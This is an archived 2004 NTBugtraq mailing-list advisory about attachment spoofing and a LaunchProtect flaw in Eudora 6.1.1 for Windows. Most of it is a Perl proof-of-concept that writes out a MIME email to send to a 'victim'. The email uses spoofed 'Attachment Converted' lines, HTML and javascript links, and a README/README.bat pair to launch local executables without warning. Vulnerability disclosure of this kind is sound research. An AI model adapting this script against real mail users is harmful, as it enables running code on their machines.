'Eudora 6.1.1 attachment spoof, LaunchProtect'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       ntbugtraq
Subject:    Eudora 6.1.1 attachment spoof, LaunchProtect
From:       Paul Szabo <psz () MATHS ! USYD ! EDU ! AU>
Date:       2004-05-21 1:16:25
Message-ID: 200405210116.i4L1GPq19870 () milan ! maths ! usyd ! edu ! au
[Download RAW message or body]

Eudora 6.1.1 for Windows was released recently. Some buffer oveflow
(exploitable to execute any code) issues seem to be solved, but serious
problems remain. (I do not know if Eudora for Macs is affected.)

Though known for years, the spoofing of attachments is still not fixed.
The problem with LaunchProtect (the X - X.exe dichotomy issue) is not
fixed either (rather it seems un-fixed).

Please see
  http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx
for more details and history.

Harmless demo below.

Cheers,

Paul Szabo - psz@maths.usyd.edu.au  http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics  University of Sydney   2006  Australia


#!/usr/bin/perl --

use MIME::Base64;

print "From: me\n";
print "To: you\n";
print "Subject: Eudora 6.1.1 on Windows spoof, LaunchProtect\n";
print "MIME-Version: 1.0\n";
print "Content-Type: multipart/mixed; boundary=\"zzz\"\n";
print "X-Use: Pipe the output of this script into:  sendmail -i victim\n\n";
print "This is a multi-part message in MIME format.\n";
print "--zzz\n";
print "Content-Type: text/plain\n";
print "Content-Transfer-Encoding: 7bit\n";
print "\n";

print "With spoofed attachments, we could 'steal' files if the message
was forwarded (not replied to).\n";

#print "
#(Within plain-text email (or plain-text, inline MIME parts) embedded
#CR=x0d characters used to get converted internally into a NUL=x00 and
#ignored, so we could spoof \"attachment converted\" lines.
#At version 6.1.1, embedded CR seem to get converted into NL=x0a.)\n";

print "\nThe <x-xyz></x-xyz> constructs (x-html, x-rich or x-flowed)
allow spoofing attachments easily.
The following work fine (but put up warnings):\n";
print "<x-html></x-html>Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\n";
print "<x-html></x-html>Attachment Converted: c:\\winnt\\system32\\calc.exe\n";
print "<x-html></x-html>Attachment Converted: <a href=c:/winnt/system32/calc.exe>file.exe</a>\n";
print "These have broken icons, but execute without warning:\n";
print "<x-html></x-html>Attachment Converted: \"c:\\winnt\\system32\\calc\"\n";
print "<x-html></x-html>Attachment Converted: c:\\winnt\\system32\\calc\n";
print "<x-html></x-html>Attachment Converted: <a href=c:/winnt/system32/calc>file</a>\n";

print "\n<x-html>
With <b>HTML</b> <i>inclusions</i> we can do
<a href=c:/winnt/system32/calc.exe>file.exe</a>
(get warning)
<br>and
<a href=c:/winnt/system32/calc>plain file</a>
(no warning) references.
<br>(Or can do
<a href=\"http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx\">http</a>
and
<a href=\"javascript:alert(\x27hello\x27)\">javascript</a>
references; the latter
<br>seems to run with IE, regardless of default browser settings.).
</x-html>\n";

print "\n\n<x-rich>
Can also do RTF inclusions. Can that be abused?
</x-rich>\n\n";

print "\n--zzz\n";
print "Content-Type: text/plain; name=\"b64.txt\"\n";
print "Content-Transfer-Encoding: base64\n";
print "Content-Disposition: inline; filename=\"b64.txt\"\n";
print "\n";
$z = "Can no longer spoof attachments in quoted-printable parts, but\r
still can within base64 encoded (plain-text, inline) MIME parts:\r
Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\r
Attachment Converted: \"c:\\winnt\\system32\\calc\"\r\n";
print encode_base64($z);

print "\n--zzz\n";
print "Content-Type: text/plain\n";
print "Content-Transfer-Encoding: 7bit\n";
print "\n";

$X = 'README'; $Y = "$X.bat";
print "\n\n\nThe X - X.exe dichotomy: send a plain $X attachment:\n";
$z = "rem Funny joke\r\npause\r\n";
print "begin 600 $X\n", pack('u',$z), "`\nend\n";
print "\nand (in another message or after some blurb so is scrolled off in
another screenful) also send $Y. Clicking on $X does not
get it any more, but gets $Y and runs without any warning:\n";
$z = "rem Big joke\r\nrem Should do something nasty\r\npause\r\n";
print "begin 600 $Y\n", pack('u',$z), "`\nend\n";

#print "\nIf we can guess the full path to the attach directory then can
#change the name shown to anything we like, but get broken icon:\n";
#print "<x-html></x-html>Attachment Converted: attach\\README\n";
#print "<x-html></x-html>Attachment Converted: <a href=H:/windows/.eudora/attach/README>file.txt</a>\n";

#print "\nFunny: I thought that since version 6.0, LaunchProtect handled
#the X-X.exe dichotomy (in the attach directory only)...\n";

print "\n";
print "\n--zzz--\n";
print "\n";

-----
Patch Automation v6.0 by Mobile Automation, Inc. allows you to quickly
identify and fix all PC's that are exposed to the Sasser worm! Our
solution provides quick and seamless discovery and deployment of all your
PC computer's Microsoft security patching needs. Regardless of where
you're PC's reside (inside the LAN, at home or on the road), Patch
Automation gets the job done. Contact us to learn about our free 30-day
trial version at 800-344-1150 or visit our website at
<http://www.patchautomation.com>
-----
[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic